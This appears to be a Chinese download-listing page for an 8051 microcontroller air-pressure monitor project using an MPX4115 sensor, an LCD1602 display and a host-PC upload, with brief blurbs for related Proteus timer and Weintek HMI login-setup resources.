1446-基于51单片机的气压检测(MPX4115,上位机,LCD)proteus,原理图、流程图、物料清单、仿真图、源代码 资料介绍: 1、使用气压传感器MPX4115检测气压 2、利用LCD1602显示气压 3、把气压值上传到上位机 有哪些资料: 1、仿真工程文件 2、源代码工程文件 3、原理图工程文件 4、流程图 5、功能介绍 6、元件清单 7、上位机软件 8、演示视频
8051Proteus仿真c源码用定时器T0的中断实现长时间定时
最新发布
09-06
8051Proteus仿真c源码用定时器T0的中断实现长时间定时提取方式是百度网盘分享地址
威纶通HMI登陆方式(二):索引密码登陆
09-06
通过用户参数设置、高级安全模式控制地址的使用以及用户登陆界面的设计实现威纶通HMI索引密码登陆。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值